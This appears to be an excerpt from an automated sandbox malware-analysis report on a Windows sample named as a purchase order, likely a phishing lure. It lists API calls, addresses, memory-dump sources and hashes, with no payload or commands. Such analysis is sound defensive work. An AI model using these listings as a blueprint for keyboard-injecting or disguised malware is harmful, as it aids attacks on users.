                                                            • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                            • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                            • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                            • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                            APIs
                                                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                            • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                            • ExitThread.KERNEL32 ref: 00413D4E
                                                            • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                            • __freefls@4.LIBCMT ref: 00413D74
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                            • String ID:
                                                            • API String ID: 259663610-0
                                                            • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                            • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                            • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                            • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 004302E6
                                                            • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                            • GetClientRect.USER32(?,?), ref: 00430364
                                                            • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                            • GetWindowRect.USER32(?,?), ref: 004303C3
                                                            • ScreenToClient.USER32(?,?), ref: 004303EC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                            • String ID:
                                                            • API String ID: 3220332590-0
                                                            • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                            • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                            • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                            • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _malloc_wcslen$_strcat_wcscpy
                                                            • String ID:
                                                            • API String ID: 1612042205-0
                                                            • Opcode ID: 90bc39558da55aafea0c644d420268c7464c042d06742de0e50a33b275c20799
                                                            • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                            • Opcode Fuzzy Hash: 90bc39558da55aafea0c644d420268c7464c042d06742de0e50a33b275c20799
                                                            • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove_strncmp
                                                            • String ID: >$U$\
                                                            • API String ID: 2666721431-237099441
                                                            • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                            • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                            • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                            • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 0044C570
                                                            • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                            • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                            • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                            • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$InputSend
                                                            APIs
                                                            Similarity
                                                            • API ID: _wcscpy$_wcscat
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                            • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                            • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                            • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                            Similarity
                                                            • API ID: Variant$Copy$AllocClearErrorLastString
                                                            APIs
                                                            Similarity
                                                            • API ID: File$Delete$Copy__fread_nolock
                                                            APIs
                                                            • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                            • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                            • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                            • EndPaint.USER32(?,?), ref: 00447D13
                                                            Similarity
                                                            • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                            APIs
                                                            • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                            • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                            • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow$InvalidateRect
                                                            APIs
                                                            • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                            • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                            • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                            • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                            • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            Strings
                                                            Similarity
                                                            • API ID: Variant$Copy$ClearErrorLast
                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                            APIs
                                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                            Similarity
                                                            • API ID: Window$Enable$Show$MessageSend
                                                            APIs
                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                            • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                            • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                            • SendMessageW.USER32 ref: 00471AE3
                                                            • DestroyIcon.USER32(?), ref: 00471AF4
                                                            Similarity
                                                            • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                            • String ID:
                                                            • API String ID: 3611059338-0
                                                            • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                            • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                            • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                            • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                            Similarity
                                                            • API ID: DestroyWindow$DeleteObject$IconMove
                                                            • String ID:
                                                            • API String ID: 1640429340-0
                                                            • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                            • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                            • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                            • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                            APIs
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • _wcslen.LIBCMT ref: 004438CD
                                                            • _wcslen.LIBCMT ref: 004438E6
                                                            • _wcstok.LIBCMT ref: 004438F8
                                                            • _wcslen.LIBCMT ref: 0044390C
                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                            • _wcstok.LIBCMT ref: 00443931
                                                            Similarity
                                                            • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                            • String ID:
                                                            • API String ID: 3632110297-0
                                                            • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                            • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                            • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                            • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                            Similarity
                                                            • API ID: Destroy$DeleteMenuObject$IconWindow
                                                            • String ID:
                                                            • API String ID: 752480666-0
                                                            • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                            • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                            • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                            • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                            Similarity
                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                            • String ID:
                                                            • API String ID: 3275902921-0
                                                            • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                            • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                            • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                            • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                            Similarity
                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                            • String ID:
                                                            • API String ID: 3275902921-0
                                                            • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                            • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                            • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                            • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                            APIs
                                                            • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                            • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                            • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                            • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                            APIs
                                                            • SendMessageW.USER32 ref: 004555C7
                                                            • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                            Similarity
                                                            • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                            • String ID:
                                                            • API String ID: 3691411573-0
                                                            • Opcode ID: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                                            • Instruction ID: ee39a3c17b45488341a0d6beee4a1abd3419bb98b1a9b0cd73eda499273a4889
                                                            • Opcode Fuzzy Hash: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                                            • Instruction Fuzzy Hash: C011B6B12047419BC710DF65EDC8A2A77A8BF18322F10066AFD50DB2D2D779D849C729
                                                            APIs
                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                            • LineTo.GDI32(?,?,?), ref: 004472AC
                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                            • LineTo.GDI32(?,?,?), ref: 004472C6
                                                            • EndPath.GDI32(?), ref: 004472D6
                                                            • StrokePath.GDI32(?), ref: 004472E4
                                                            Similarity
                                                            • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                            • String ID:
                                                            • API String ID: 372113273-0
                                                            • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                            • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                            • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                            • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 0044CC6D
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                            • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                            • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                            • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                            APIs
                                                            • __getptd.LIBCMT ref: 0041708E
                                                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                            • __amsg_exit.LIBCMT ref: 004170AE
                                                            • __lock.LIBCMT ref: 004170BE
                                                            • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                            • _free.LIBCMT ref: 004170EE
                                                            • InterlockedIncrement.KERNEL32(00A02D28), ref: 00417106
                                                            Similarity
                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                            • String ID:
                                                            • API String ID: 3470314060-0
                                                            • Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                            • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                            • Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                            • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                            • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                              • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                            • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                            • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                            • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                            • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                            • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                            • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                            APIs
                                                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                            • ExitThread.KERNEL32 ref: 004151ED
                                                            • __freefls@4.LIBCMT ref: 00415209
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                            • String ID:
                                                            • API String ID: 442100245-0
                                                            • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                            • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                            • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                            • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                            APIs
